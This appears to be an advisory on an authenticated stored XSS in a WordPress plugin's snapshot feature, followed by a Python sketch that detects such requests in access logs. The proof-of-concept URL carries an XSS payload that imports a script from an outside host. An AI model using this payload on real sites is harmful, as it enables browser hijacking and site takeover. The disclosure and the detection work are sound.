The plugin did not sanitise or escape its extra_data parameter when creating a snapshot via the admin dashboard, leading to an authenticated Stored Cross-Site Scripting issue.
PoC | Authenticated Persistent XSS | Enter snapshot name or brief description: https://example.com/wp-admin/admin-ajax.php?action=wp_reset_run_tool&_ajax_nonce=394f497fd0&tool=create_snapshot&extra_data=<img src%3Dx onerror%3D%3Bimport(`%2F%2Fm0ze.ru%2Fpayload%2Fa.js`)%3B %2F%2F>
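
Detection sketch for the request shape shown in the PoC, as an added example that is not part of the original advisory or the plugin's code: it scans web server access logs for create_snapshot calls whose decoded extra_data carries HTML markup. The log lines, addresses and nonce values are constructed, and the function name and markup pattern are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); addresses, nonces and values are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2021:10:00:01 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=wp_reset_run_tool&_ajax_nonce=0000000000&tool=create_snapshot'
    '&extra_data=before+plugin+update HTTP/1.1" 200 64',
    '203.0.113.9 - - [10/Jan/2021:10:02:13 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=wp_reset_run_tool&_ajax_nonce=0000000000&tool=create_snapshot'
    '&extra_data=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 64',
    '203.0.113.9 - - [10/Jan/2021:10:03:40 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heartbeat&extra_data=%3Cb%3E HTTP/1.1" 200 12',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Markup indicators that have no place in a snapshot name or description.
MARKUP_RE = re.compile(r'[<>]|\bon\w+\s*=|javascript:', re.IGNORECASE)


def suspicious_snapshot_requests(lines):
    """Return (line_number, decoded extra_data) for snapshot requests carrying markup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        # parse_qs percent-decodes values, so encoded markup is seen in clear form.
        params = parse_qs(url.query, keep_blank_values=True)
        if "wp_reset_run_tool" not in params.get("action", []):
            continue
        if "create_snapshot" not in params.get("tool", []):
            continue
        for value in params.get("extra_data", []):
            if MARKUP_RE.search(value):
                hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in suspicious_snapshot_requests(SAMPLE_LOG):
        print(f"line {number}: extra_data={value!r}")
```

It only sees parameters sent in the query string, as in the PoC; a request body is not recorded in an access log.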